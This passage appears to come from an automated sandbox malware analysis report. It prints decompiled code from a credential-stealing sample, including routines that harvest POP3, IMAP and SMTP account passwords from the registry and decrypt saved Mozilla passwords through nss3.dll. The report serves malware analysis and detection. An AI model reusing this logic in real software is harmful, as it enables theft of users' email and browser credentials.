                                                                                                                                                    0x0040dfd7
                                                                                                                                                    0x0040dfe7
                                                                                                                                                    0x0040dfeb
                                                                                                                                                    0x0040dfed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040dfed
                                                                                                                                                    0x0040dfd5
                                                                                                                                                    0x0040dfbd
                                                                                                                                                    0x0040e053

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040DF0F
                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                                                                    • memset.MSVCRT ref: 0040DF62
                                                                                                                                                    • strlen.MSVCRT ref: 0040DF6C
                                                                                                                                                    • strlen.MSVCRT ref: 0040DF7A
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                    • API String ID: 1296682400-4029219660
                                                                                                                                                    • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                                                                    • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                                                                                    • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                                                                    • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402606 Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                    			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                                                                                                    0x00402606
                                                                                                                                                    0x00402606
                                                                                                                                                    0x00402607
                                                                                                                                                    0x0040260b
                                                                                                                                                    0x00402614
                                                                                                                                                    0x0040261b
                                                                                                                                                    0x00402622
                                                                                                                                                    0x00402629
                                                                                                                                                    0x00402630
                                                                                                                                                    0x00402637
                                                                                                                                                    0x0040263e
                                                                                                                                                    0x00402645
                                                                                                                                                    0x0040264c
                                                                                                                                                    0x00402653
                                                                                                                                                    0x0040265a
                                                                                                                                                    0x00402661
                                                                                                                                                    0x00402668
                                                                                                                                                    0x0040266f
                                                                                                                                                    0x00402676
                                                                                                                                                    0x0040267d
                                                                                                                                                    0x00402684
                                                                                                                                                    0x0040268b
                                                                                                                                                    0x00402692
                                                                                                                                                    0x00402699
                                                                                                                                                    0x004026a0
                                                                                                                                                    0x004026a2
                                                                                                                                                    0x004026aa
                                                                                                                                                    0x004026ae
                                                                                                                                                    0x004026b6
                                                                                                                                                    0x004026b9
                                                                                                                                                    0x004026bc
                                                                                                                                                    0x004026c0
                                                                                                                                                    0x004026c5
                                                                                                                                                    0x004026c6
                                                                                                                                                    0x004026cb
                                                                                                                                                    0x004026d0
                                                                                                                                                    0x004026dc
                                                                                                                                                    0x004026ec
                                                                                                                                                    0x004026f4
                                                                                                                                                    0x004026f7
                                                                                                                                                    0x004026fd
                                                                                                                                                    0x00402700
                                                                                                                                                    0x0040270c
                                                                                                                                                    0x0040270d
                                                                                                                                                    0x00402711
                                                                                                                                                    0x00402714
                                                                                                                                                    0x00402715
                                                                                                                                                    0x00402720
                                                                                                                                                    0x00402721
                                                                                                                                                    0x00402726
                                                                                                                                                    0x00402729
                                                                                                                                                    0x0040272a
                                                                                                                                                    0x00402735
                                                                                                                                                    0x00402736
                                                                                                                                                    0x0040273b
                                                                                                                                                    0x0040273e
                                                                                                                                                    0x0040273f
                                                                                                                                                    0x00402744
                                                                                                                                                    0x0040274a
                                                                                                                                                    0x00402752
                                                                                                                                                    0x00402753
                                                                                                                                                    0x00402758
                                                                                                                                                    0x0040275b
                                                                                                                                                    0x0040275c
                                                                                                                                                    0x00402761
                                                                                                                                                    0x00402761
                                                                                                                                                    0x0040276d
                                                                                                                                                    0x0040277b
                                                                                                                                                    0x00402780
                                                                                                                                                    0x00402791
                                                                                                                                                    0x00402796
                                                                                                                                                    0x004027a9
                                                                                                                                                    0x004027af
                                                                                                                                                    0x004027b7
                                                                                                                                                    0x004027b7
                                                                                                                                                    0x004027bc
                                                                                                                                                    0x004027bd
                                                                                                                                                    0x004027cd

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004026AE
                                                                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,7554ED80,?,00000000), ref: 004026EC
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$QueryValuememset
                                                                                                                                                    • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                    • API String ID: 3373037483-1627711381
                                                                                                                                                    • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                                                                    • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                                                                                    • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                                                                    • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004027D0 Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E004027D0(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t92;
				void* _t95;
				intOrPtr _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t121;

				_t121 = __fp0;
				_t111 = _t113 - 0x70;
				_t114 = _t113 - 0x474;
				 *(_t111 + 0x40) = "POP3 Password";
				 *(_t111 + 0x44) = "IMAP Password";
				 *(_t111 + 0x48) = "HTTP Password";
				 *(_t111 + 0x4c) = "SMTP Password";
				 *(_t111 + 0x50) = "POP3 User";
				 *(_t111 + 0x54) = "IMAP User";
				 *(_t111 + 0x58) = "HTTP User";
				 *(_t111 + 0x5c) = "SMTP User";
				 *(_t111 + 0x20) = "POP3 Server";
				 *(_t111 + 0x24) = "IMAP Server";
				 *(_t111 + 0x28) = "HTTP Server URL";
				 *(_t111 + 0x2c) = "SMTP Server";
				 *(_t111 + 0x30) = "POP3 Port";
				 *(_t111 + 0x34) = "IMAP Port";
				 *(_t111 + 0x38) = "HTTP Port";
				 *(_t111 + 0x3c) = "SMTP Port";
				 *(_t111 + 0x60) = "POP3 Use SPA";
				 *(_t111 + 0x64) = "IMAP Use SPA";
				 *(_t111 + 0x68) = "HTTPMail Use SSL";
				 *(_t111 + 0x6c) = "SMTP Use SSL";
				_t92 = 0;
				do {
					 *(_t111 - 0x60) = 0;
					memset(_t111 - 0x5f, 0, 0x7f);
					_t114 = _t114 + 0xc;
					_t100 = _t92 << 2;
					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
					if(_t66 != 0) {
						E004021D8(_t111 - 0x404);
						strcpy(_t111 - 0x1f0, _t111 - 0x60);
						_pop(_t95);
						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
						_t37 = _t92 + 1; // 0x1
						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
						if(_t92 != 3) {
							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
							_t114 = _t114 + 0xc;
						}
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
						_t109 =  *((intOrPtr*)(_t111 + 0x78));
						_t114 = _t114 + 0x18;
						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
					}
					_t92 = _t92 + 1;
				} while (_t92 < 4);
				return _t66;
			}












                                                                                                                                                    0x004027d0
                                                                                                                                                    0x004027d1
                                                                                                                                                    0x004027d5
                                                                                                                                                    0x004027de
                                                                                                                                                    0x004027e5
                                                                                                                                                    0x004027ec
                                                                                                                                                    0x004027f3
                                                                                                                                                    0x004027fa
                                                                                                                                                    0x00402801
                                                                                                                                                    0x00402808
                                                                                                                                                    0x0040280f
                                                                                                                                                    0x00402816
                                                                                                                                                    0x0040281d
                                                                                                                                                    0x00402824
                                                                                                                                                    0x0040282b
                                                                                                                                                    0x00402832
                                                                                                                                                    0x00402839
                                                                                                                                                    0x00402840
                                                                                                                                                    0x00402847
                                                                                                                                                    0x0040284e
                                                                                                                                                    0x00402855
                                                                                                                                                    0x0040285c
                                                                                                                                                    0x00402863
                                                                                                                                                    0x0040286a
                                                                                                                                                    0x0040286c
                                                                                                                                                    0x00402874
                                                                                                                                                    0x00402878
                                                                                                                                                    0x0040287d
                                                                                                                                                    0x00402882
                                                                                                                                                    0x0040288f
                                                                                                                                                    0x00402896
                                                                                                                                                    0x004028a2
                                                                                                                                                    0x004028b2
                                                                                                                                                    0x004028c1
                                                                                                                                                    0x004028c6
                                                                                                                                                    0x004028cf
                                                                                                                                                    0x004028d8
                                                                                                                                                    0x004028de
                                                                                                                                                    0x004028f1
                                                                                                                                                    0x00402904
                                                                                                                                                    0x0040290c
                                                                                                                                                    0x0040291c
                                                                                                                                                    0x0040292d
                                                                                                                                                    0x00402932
                                                                                                                                                    0x00402932
                                                                                                                                                    0x00402940
                                                                                                                                                    0x00402950
                                                                                                                                                    0x00402955
                                                                                                                                                    0x00402958
                                                                                                                                                    0x0040296d
                                                                                                                                                    0x00402980
                                                                                                                                                    0x0040298e
                                                                                                                                                    0x0040298e
                                                                                                                                                    0x00402993
                                                                                                                                                    0x00402994
                                                                                                                                                    0x004029a4

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00402878
                                                                                                                                                      • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                                                                                    • strcpy.MSVCRT(?,?,7554ED80,?,00000000), ref: 004028B2
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7554ED80,?,00000000), ref: 00402980
                                                                                                                                                      • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                                                                                    • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                    • API String ID: 2416467034-4086712241
                                                                                                                                                    • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                                                                    • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                                                                                    • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                                                                    • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F435 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                                                                                                    0x0040f449
                                                                                                                                                    0x0040f453
                                                                                                                                                    0x0040f459
                                                                                                                                                    0x0040f46b
                                                                                                                                                    0x0040f471
                                                                                                                                                    0x0040f484
                                                                                                                                                    0x0040f486
                                                                                                                                                    0x0040f48b
                                                                                                                                                    0x0040f490
                                                                                                                                                    0x0040f5e6
                                                                                                                                                    0x0040f5ee
                                                                                                                                                    0x0040f5f7
                                                                                                                                                    0x0040f600
                                                                                                                                                    0x0040f60e
                                                                                                                                                    0x0040f610
                                                                                                                                                    0x0040f610
                                                                                                                                                    0x0040f614
                                                                                                                                                    0x0040f616
                                                                                                                                                    0x0040f623
                                                                                                                                                    0x0040f625
                                                                                                                                                    0x0040f625
                                                                                                                                                    0x0040f629
                                                                                                                                                    0x0040f62d
                                                                                                                                                    0x0040f63b
                                                                                                                                                    0x0040f63d
                                                                                                                                                    0x0040f63d
                                                                                                                                                    0x0040f63b
                                                                                                                                                    0x0040f629
                                                                                                                                                    0x0040f614
                                                                                                                                                    0x0040f64a
                                                                                                                                                    0x0040f496
                                                                                                                                                    0x0040f4a3
                                                                                                                                                    0x0040f4a9
                                                                                                                                                    0x0040f4b9
                                                                                                                                                    0x0040f4bc
                                                                                                                                                    0x0040f4c1
                                                                                                                                                    0x0040f5d5
                                                                                                                                                    0x0040f4c9
                                                                                                                                                    0x0040f4cb
                                                                                                                                                    0x0040f4d1
                                                                                                                                                    0x0040f4d6
                                                                                                                                                    0x0040f4d7
                                                                                                                                                    0x0040f4dc
                                                                                                                                                    0x0040f4e1
                                                                                                                                                    0x0040f4f0
                                                                                                                                                    0x0040f4f6
                                                                                                                                                    0x0040f508
                                                                                                                                                    0x0040f50e
                                                                                                                                                    0x0040f519
                                                                                                                                                    0x0040f51a
                                                                                                                                                    0x0040f525
                                                                                                                                                    0x0040f52a
                                                                                                                                                    0x0040f52b
                                                                                                                                                    0x0040f547
                                                                                                                                                    0x0040f54c
                                                                                                                                                    0x0040f552
                                                                                                                                                    0x0040f554
                                                                                                                                                    0x0040f555
                                                                                                                                                    0x0040f55a
                                                                                                                                                    0x0040f55f
                                                                                                                                                    0x0040f561
                                                                                                                                                    0x0040f561
                                                                                                                                                    0x0040f569
                                                                                                                                                    0x0040f581
                                                                                                                                                    0x0040f582
                                                                                                                                                    0x0040f589
                                                                                                                                                    0x0040f591
                                                                                                                                                    0x0040f592
                                                                                                                                                    0x0040f5a2
                                                                                                                                                    0x0040f5b5
                                                                                                                                                    0x0040f5ba
                                                                                                                                                    0x0040f5ba
                                                                                                                                                    0x0040f592
                                                                                                                                                    0x0040f569
                                                                                                                                                    0x0040f5bd
                                                                                                                                                    0x0040f5cd
                                                                                                                                                    0x0040f5d2
                                                                                                                                                    0x0040f5d2
                                                                                                                                                    0x0040f5e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f5e0

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F459
                                                                                                                                                    • memset.MSVCRT ref: 0040F471
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 0040F4A9
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                                                                                    • memset.MSVCRT ref: 0040F4F6
                                                                                                                                                    • memset.MSVCRT ref: 0040F50E
                                                                                                                                                    • _snprintf.MSVCRT ref: 0040F52B
                                                                                                                                                    • _mbsrchr.MSVCRT ref: 0040F555
                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040F589
                                                                                                                                                    • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                                                                                    • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                    • API String ID: 3269028891-3267283505
                                                                                                                                                    • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                                                                                    • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                                                                                    • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                                                                                    • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F126 Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
